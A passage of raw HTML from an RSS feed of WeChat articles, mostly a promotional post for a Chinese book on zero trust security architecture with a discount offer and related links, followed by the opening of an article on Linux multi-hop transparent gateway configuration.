100% !important;box-sizing:border-box;vertical-align: inherit;width: 100%;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=fa36f4a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FPW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qeZ0p0kFaibYUCo8M1arXGnK0jC58rH7vovic3WGNz8EmpKMS6bdgySyqA%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: #E36C09;"><em><span style="font-size: 28px;"><strong><span style="letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">02.</span></strong></span></em></span><span style="font-size: 17px;"><strong><span style="color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"> 实战</span></strong></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">本书不单纯剖析技术理论，而是从企业建设的甲方视角思考，从国内实际情况出发，挖掘零信任的价值和作用，总结落地实施的最佳实践。</span></p><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"><img class="rich_pages wxw-img" data-ratio="0.918648310387985" style="box-sizing: border-box;vertical-align: inherit;border-width: 1px;border-style: solid;border-color: rgb(151, 152, 153);background-color: rgb(255, 255, 255);border-radius: 0px;padding: 4px;width: 448px;height: 411.547px;" data-type="png" data-w="799" src="https://wechat2rss.xlab.app/img-proxy/?k=4975e79e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FPW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qe6SicXlYgzOqg2C0ayFficIfaJf328nrm0PTf5GrXTmwPLmvXIs3FibfNw%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: #E36C09;"><em><span style="font-size: 28px;"><strong><span style="letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">03.</span></strong></span></em><strong><span style="font-size: 15px;letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"> </span></strong></span><span style="font-size: 17px;"><strong><span style="color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">白话</span></strong></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">通过直白、易懂的语言，深入浅出地介绍零信任架构中的各种新兴技术，在实际例子中说明各类技术的原理、用处、限制。</span></p><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"><img class="rich_pages wxw-img" data-ratio="0.7443037974683544" style="box-sizing: border-box;vertical-align: inherit;border-width: 1px;border-style: solid;border-color: rgb(151, 152, 153);background-color: rgb(255, 255, 255);border-radius: 0px;padding: 4px;width: 448px;height: 333.438px;" data-type="png" data-w="790" src="https://wechat2rss.xlab.app/img-proxy/?k=0bc3cc0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FPW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qeiaMgCA7nVQ8AoRfMW2s2clcHx82ZIIicLHHOL639ZNMrp9CSJsClIrww%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"><br/></span></p><section data-role="title" data-tools="135编辑器" data-id="113244"><section style="margin: 20px auto;"><section style="display: flex;justify-content: center;"><section style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/PW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qesY5GJr7iaSz7nQXXO3FOEfqTYJe2GIDsCTbag7ibW1vO3K6LJ8vZsW3g/640?wx_fmt=png&#34;) center center / 100% no-repeat;height: 35px;margin-left: -15px;transform: translateZ(4px);"><section style="font-size: 16px;color: rgb(255, 255, 255);text-align: center;padding: 0px 30px;line-height: 32px;box-sizing: border-box;"><strong data-brushtype="text" hm_fix="304:433">适读人群</strong></section></section></section></section></section><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">《白话零信任》适合</span><span style="color: #E36C09;"><strong><span style="font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">从事网络安全工作的各类人群</span></strong></span><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">。</span></p><section data-role="list"><ul class="list-paddingleft-1" style="list-style-type: disc;margin: 0px;padding: 0px 0px 0px 30px;"><li><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;text-shadow: rgb(250, 192, 143) 0px 0px 8px;font-family: Helvetica, Arial, sans-serif;">初学者</span><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">可以将本书当作入门教材，全面了解零信任理论和技术知识。</span></p></li><li><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;text-shadow: rgb(250, 192, 143) 0px 0px 8px;font-family: Helvetica, Arial, sans-serif;">资深读者</span><span style="color: rgb(59, 59, 59);font-size: 15px;letter-spacing: 1px;caret-color: red;font-family: Helvetica, Arial, sans-serif;">可以将本书当作一本实践手册，对比书中介绍的场景和案例，规划自己企业的建设和运营工作。</span><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"></span></p></li></ul></section><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><br/></p><section yne-bulb-block="paragraph" style="white-space:pre-wrap;line-height:1.75;font-size:14px;text-align:left;"><section data-id="89894" data-tools="135编辑器"><section style="max-width:100% !important;box-sizing:border-box;width:100%;text-align:center;" hm_fix="244:447" data-width="100%"><img class="rich_pages wxw-img" data-ratio="1" style="box-sizing:border-box;vertical-align:inherit;width:60px;" data-w="100" src="https://wechat2rss.xlab.app/img-proxy/?k=c28fa7a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FfgnkxfGnnkTkJIfWr9IueKsXFibaLaicJkRxJibPxKsxQFia5bylsyH1fdOBgDd11ibnth10uSKyNh4zdIMSmu09N7Q%2F640%3Fwx_fmt%3Dgif"/></section></section></section><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">希望《白话零信任》能帮助读者朋友们快速掌握零信任知识的，帮助读者朋友们更好地完成零信任的研究和实践工作。</span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">同时，作者也希望跟大家交流互动，共同探讨如何将这么好的架构在更多场景中落地。</span></p><p style="text-align:center;line-height: 1.75em;margin-left: 8px;margin-right: 8px;margin-bottom: 0px;"><span style="font-size: 17px;color: #C00000;"><strong><span style="font-size: 17px;letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">粉丝专享福利，</span></strong></span><strong style="color: rgb(192, 0, 0);caret-color: red;"><span style="letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;">限时49元包邮</span></strong></p><p style="text-align:center;line-height: 1.75em;margin-left: 8px;margin-right: 8px;margin-bottom: 0px;"><span style="font-size: 17px;color: #C00000;"><strong><span style="letter-spacing: 1px;font-size: 17px;color: rgb(192, 0, 0);font-family: Helvetica, Arial, sans-serif;">快快扫码抢购吧</span></strong></span></p><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"><img class="rich_pages wxw-img" data-ratio="1" width="150" data-type="png" data-w="300" data-width="150px" style="box-sizing:border-box;vertical-align: inherit;width: 150px;" src="https://wechat2rss.xlab.app/img-proxy/?k=04de87ef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FPW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qeGmeEG757VDx7wD9cHXmFPn8TcNYd1tSEjKfGXXLGHcak4TwDQ2tG7Q%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align:center;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><span style="font-size: 15px;color: rgb(59, 59, 59);letter-spacing: 1px;font-family: Helvetica, Arial, sans-serif;"><img class="rich_pages wxw-img" data-ratio="1.3721518987341772" style="max-width: 100% !important;box-sizing:border-box;vertical-align: inherit;width: 100%;" data-type="jpeg" data-w="790" src="https://wechat2rss.xlab.app/img-proxy/?k=8a45f39e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FPW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qegC6MYDcGltJDENIMS81FkKaoeYiaeApBHQwxCcQe8IfdHAIJWtIh92w%2F640%3Fwx_fmt%3Djpeg"/></span></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><img class="rich_pages wxw-img" data-cropselx1="0" data-cropselx2="562" data-cropsely1="0" data-cropsely2="1059" data-ratio="1.8759493670886076" style="box-sizing: border-box;vertical-align: inherit;width: 565px;max-width: 100% !important;height: 1059px;" data-type="jpeg" data-w="790" src="https://wechat2rss.xlab.app/img-proxy/?k=d6d65ec2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FPW0wIHxgg3l0kpMdJKlTmRtPdtxkQ6qePSANoPLkT0hyfqPjWcu6CuKXGFrv1UoKNCvymlic7nyTxoKYEr0YIFw%2F640%3Fwx_fmt%3Djpeg"/></p><p style="text-align:justify;margin-bottom: 20px;line-height: 1.75em;margin-left: 8px;margin-right: 8px;"><br/></p><p style="text-align:center;margin: 0px 2px 20px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;color: rgb(34, 34, 34);font-size: 17px;letter-spacing: 0.544px;vertical-align: inherit;line-height: 1.75em;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system, BlinkMacSystemFont, Arial, sans-serif;"><img class="rich_pages wxw-img" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/PW0wIHxgg3ntPMYAJur3UuYzhSDgO7Puv74VHDtgNjyJbpQvt1gicgSpjrlpDy6BheYoAmtjiaF7cdIuPkuUlFkw/0?wx_fmt=png" data-cropx1="0" data-cropx2="1920" data-cropy1="0" data-cropy2="29.8961937716263" data-ratio="0.01574074074074074" data-s="300,640" width="661px" data-type="jpeg" data-w="1080" style="box-sizing: border-box;margin: 0px;padding: 0px;outline: 0px;vertical-align: inherit;letter-spacing: 0.544px;color: rgb(150, 150, 150);background-color: rgb(255, 255, 255);text-indent: 2em;font-size: 16px;border-radius: 6px;width: 661px;overflow-wrap: break-word !important;height: auto !important;visibility: visible !important;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;" src="https://wechat2rss.xlab.app/img-proxy/?k=e7808f70&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FPW0wIHxgg3ntPMYAJur3UuYzhSDgO7Pu8DQL5f0FQIuDZC87yrAuNLy4frEdlMeWkthrlzczb0RbMOBQCAwDrA%2F640%3Fwx_fmt%3Djpeg"/><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;letter-spacing: 0.544px;text-indent: 0em;color: rgb(150, 150, 150);font-size: 13px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Helvetica, Arial, sans-serif;"></span></p><pre data-tool="mdnice编辑器" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(34, 34, 34);letter-spacing: 0.544px;text-align: justify;font-size: 16px;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system, BlinkMacSystemFont, Arial, sans-serif;"><section style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><section data-role="paragraph" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><pre data-tool="mdnice编辑器" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(150, 150, 150);font-size: 13px;letter-spacing: 0.544px;text-align: left;"><section style="margin: 0px 8px 20px;padding: 0px;outline: 0px;max-width: 100%;letter-spacing: 0.544px;text-indent: 0em;line-height: 1.75em;text-align: center;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(59, 59, 59);letter-spacing: 1px;font-size: 16px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Helvetica, Arial, sans-serif;">如果喜欢本文</span></section><section style="margin: 0px 16px 20px;padding: 0px;outline: 0px;max-width: 100%;letter-spacing: 0.544px;font-size: 16px;text-align: center;line-height: 1.75em;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Helvetica, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;letter-spacing: 1px;color: #3B3B3B;">欢迎</span> <span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;letter-spacing: 1px;color: #007AAA;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">在看</strong></span><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;letter-spacing: 1px;color: #3B3B3B;">丨</span><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;letter-spacing: 1px;color: #007AAA;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">留言</strong></span><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;letter-spacing: 1px;color: #3B3B3B;">丨</span><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;letter-spacing: 1px;color: #007AAA;"><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">分享至朋友圈</strong></span><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;letter-spacing: 1px;color: #3B3B3B;"> 三连</span></span></section><section data-mpa-template="t" mpa-from-tpl="t" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;letter-spacing: 0.544px;font-size: 16px;text-align: center;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><section data-id="92644" mpa-from-tpl="t" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-width: 0px;border-style: none;border-color: initial;"><section mpa-from-tpl="t" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><section data-width="100%" mpa-from-tpl="t" style="box-sizing:border-box;margin: 0px 0px -15px 10px;padding: 0px;outline: 0px;max-width: 100%;width: 100%;display: flex;justify-content: flex-start;overflow-wrap: break-word !important;"><section mpa-from-tpl="t" style="box-sizing:border-box;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;overflow-wrap: break-word !important;display: inline-block;width: auto;"><section mpa-from-tpl="t" style="margin: 0px -4px 0px 4px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-width: 1px;border-style: solid;border-color: rgb(17, 109, 174);height: 20px;"><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></section><section mpa-from-tpl="t" style="margin: -16px 0px 0px;padding: 2px 10px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;height: 20px;background: rgb(17, 109, 174);line-height: 16px;"><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;vertical-align: inherit;color: rgb(255, 255, 255);font-size: 14px;letter-spacing: 1px;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;font-size: 18px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Helvetica, Arial, sans-serif;"> <strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">热文推荐 </strong><strong style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> </strong></span></p></section></section></section><section mpa-from-tpl="t" style="margin: 0px;padding: 15px 20px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-width: 1px;border-style: solid;border-color: rgb(17, 109, 174);"><section mpa-from-tpl="t" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15px;letter-spacing: 1.5px;line-height: 25px;color: rgb(63, 62, 63);"><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;vertical-align: inherit;"><br/></p><ul class="list-paddingleft-1" style="box-sizing:border-box;margin: 0px;padding: 0px 0px 0px 30px;outline: 0px;max-width: 100%;overflow-wrap: break-word !important;width: 535.453px;"><li style="font-size: 12px;"><p style="text-align:left;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;vertical-align: inherit;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MjM5NTk0NjMwOQ==&amp;mid=2651157607&amp;idx=1&amp;sn=c6803ea705e471c15ea29a6183e715bf&amp;chksm=bd011e4d8a76975b8fb27dd413e9d16ade25a2a87152330a41e9d12d005247290495e7fcf264&amp;scene=21#wechat_redirect" textvalue="硅谷来信：Google、Facebook员工的“成长型思维”" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" style="font-size: 12px;" data-linktype="2"><span style="font-size: 12px;">硅谷来信：Google、Facebook员工的“成长型思维”</span></a><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></p></li><li style="margin: 0px;padding: 0px;clear: both;"><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;text-align: left;outline: 0px;max-width: 100%;vertical-align: inherit;box-sizing: border-box !important;overflow-wrap: break-word !important;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MjM5NTk0NjMwOQ==&amp;mid=2651157528&amp;idx=1&amp;sn=69220993070f2f1fa99d208de82fc15b&amp;chksm=bd011e328a7697240d11618c88fbb6940b0ac48fdbe1e5cfdb4ed937d2bda728ba832315ef16&amp;scene=21#wechat_redirect" textvalue="一本顶流著作和一次匠心翻译！《机器学习与资产定价》重磅上市！" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" hasload="1" style="margin: 0px;padding: 0px;color: rgb(87, 107, 149);text-decoration: none;outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;font-size: 12px;box-sizing: border-box !important;overflow-wrap: break-word !important;">一本顶流著作和一次匠心翻译！</span></a><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></p></li><li style="margin: 0px;padding: 0px;clear: both;"><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;text-align: left;outline: 0px;max-width: 100%;vertical-align: inherit;box-sizing: border-box !important;overflow-wrap: break-word !important;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MjM5NTk0NjMwOQ==&amp;mid=2651157485&amp;idx=1&amp;sn=8825bef8afeec73151e29eb97dced482&amp;chksm=bd0119c78a7690d148cfbe7f921cbaf53dadcdad84181e34e858d47a31286fb0a5d2ab84dee1&amp;scene=21#wechat_redirect" textvalue="更贴心、更好学的Python自动化办公教程！" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" hasload="1" style="margin: 0px;padding: 0px;color: rgb(87, 107, 149);text-decoration: none;outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;max-width: 100%;font-size: 12px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;font-size: 12px;box-sizing: border-box !important;overflow-wrap: break-word !important;">更贴心、更好学的Python自动化办公教程！</span></a><br style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"/></p></li><li style="margin: 0px;padding: 0px;clear: both;"><p style="margin: 0px;padding: 0px;clear: both;min-height: 1em;text-align: left;outline: 0px;max-width: 100%;vertical-align: inherit;box-sizing: border-box !important;overflow-wrap: break-word !important;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MjM5NTk0NjMwOQ==&amp;mid=2651157435&amp;idx=1&amp;sn=e49fd4b25336315d33c1d938ead0e876&amp;chksm=bd0119918a769087fe5afa940c0359d832fc3a823e820a7a671c1225d1c28ada19720578a242&amp;scene=21#wechat_redirect" textvalue="书单 | 轻松玩转Python自动化办公" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2" hasload="1" style="margin: 0px;padding: 0px;color: rgb(87, 107, 149);text-decoration: none;outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;max-width: 100%;font-size: 12px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;font-size: 12px;box-sizing: border-box !important;overflow-wrap: break-word !important;">书单 | 轻松玩转Python自动化办公</span></a></p></li></ul></section></section></section></section><section data-role="paragraph" mpa-from-tpl="t" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-width: 0px;border-style: none;border-color: initial;"><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;vertical-align: inherit;"><br/></p></section></section><hr style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;letter-spacing: 0.544px;font-size: 16px;text-align: center;border-style: solid;border-right-width: 0px;border-bottom-width: 0px;border-left-width: 0px;border-color: rgba(0, 0, 0, 0.098);transform-origin: 0px 0px 0px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;transform: scale(1, 0.5);-webkit-transform: scale(1, 0.5);-moz-transform: scale(1, 0.5);-ms-transform: scale(1, 0.5);-o-transform: scale(1, 0.5);"/><p style="text-align:center;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;vertical-align: inherit;letter-spacing: 0.544px;font-size: 16px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><br/></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;vertical-align: inherit;"><img class="rich_pages wxw-img" data-cropselx1="0" data-cropselx2="574" data-cropsely1="0" data-cropsely2="244" data-ratio="0.4255555555555556" data-s="300,640" width="100%" data-type="png" data-w="900" style="max-width: 100% !important;box-sizing:border-box;margin: 0px;padding: 0px;outline: 0px;vertical-align: inherit;letter-spacing: 0.544px;white-space: pre-wrap;width: 100%;overflow-wrap: break-word !important;height: auto !important;visibility: visible !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=4542c2b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FPW0wIHxgg3m3jibtjia3lCrCvUY6N19QMZ3FjCcpuHouXkdLicQVUiaLicgR8cgSbk7RA8G427GKowhbEvVefuJp53g%2F640%3Fwx_fmt%3Dpng"/></p></pre></section></section></pre><section data-role="paragraph" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(34, 34, 34);font-size: 17px;letter-spacing: 0.544px;text-align: justify;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: -apple-system, BlinkMacSystemFont, Arial, sans-serif;"><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;vertical-align: inherit;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;white-space: pre-wrap;color: rgb(0, 122, 170);font-size: 14px;letter-spacing: 0.544px;text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Helvetica, Arial, sans-serif;">▼点击阅读原文，了解本书详情~</span><span style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"></span></p><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.848" data-s="300,640" style="" data-type="png" data-w="1125" src="https://wechat2rss.xlab.app/img-proxy/?k=3969ee07&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdFiaYaPfiaUib6dLmbB5CnC0IJ4kqCgwnM9geWYPmDRfuB1S3wHzQ0MicUGXmlAHibLcc9nUF4hZ1TBtEw%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;vertical-align: inherit;"><span style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;white-space: pre-wrap;color: rgb(0, 122, 170);font-size: 14px;letter-spacing: 0.544px;text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: Helvetica, Arial, sans-serif;"></span></p></section></section>



<p><a href="https://u.jd.com/jKAiHVG">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f5ced517&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485712%26idx%3D1%26sn%3Dc97df984f221fbce48d898e3f0bf7f0f%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 01 Aug 2022 15:22:00 +0800</pubDate>
    </item>
    <item>
      <title>Linux多跳透明网关配置</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485705&amp;idx=1&amp;sn=4ddc3faf514502c8db3480b06166fc54</link>
      <description>理论上将适合任何架构，任何系统的linux网络拓扑</description>
      <content:encoded><![CDATA[<p>
<span>蛋黄</span> <span>2022-05-18 08:09</span> <span style="display: inline-block;">河北</span>
</p>

<p>理论上将适合任何架构，任何系统的linux网络拓扑</p>


<p style="margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;text-align: center;margin-left: 8px;margin-right: 8px;">
<img src="https://wechat2rss.xlab.app/img-proxy/?k=37cda657&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdEIcPmVVSnQRcjt7vkAlgPwZr7ZAbf8y8T6oIia9Qf5grhZdg9ayNX0cNr51fSiaPsTCpsb9LB2oKyQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>

